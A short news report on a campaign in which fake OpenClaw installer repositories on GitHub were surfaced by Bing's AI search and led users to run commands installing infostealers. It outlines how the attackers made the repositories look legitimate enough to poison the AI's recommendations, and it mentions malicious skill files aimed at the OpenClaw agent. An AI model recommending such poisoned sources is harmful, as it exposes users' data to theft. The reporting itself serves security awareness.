Cyber: Bing AI Promoted Fake Openclaw Github Repo Pushing Info-stealing...

Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware.

OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services.

Due to its widespread local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and GitHub.

Researchers at managed detection and response company Huntress discovered a new campaign last month that spread multiple executables for malware loaders and infostealers to users looking to install OpenClaw.

According to the researchers, the threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool.

Bing AI's suggested download link in the image above points to a malicious OpenClaw installer on GitHub, Huntress researchers said in a report.

The researchers say that "just hosting the malware on GitHub was enough to poison Bing AI search results."

A fake OpenClaw repository that Huntress analyzed appeared legitimate at a quick look, as the threat actor tied it to a GitHub organization named openclaw-installer. This may also have carried some weight in Bing's AI recommendation.

The GitHub accounts publishing these repositories were newly created, but attempted to increase their legitimacy by copying real code from the Cloudflare moltworker project.

However, the repository provided an installation guide for OpenClaw on macOS, instructing the user to paste a bash command in Terminal. This would reach a separate GitHub organization called puppeteerrr and a repository named dmg.

Source: BleepingComputer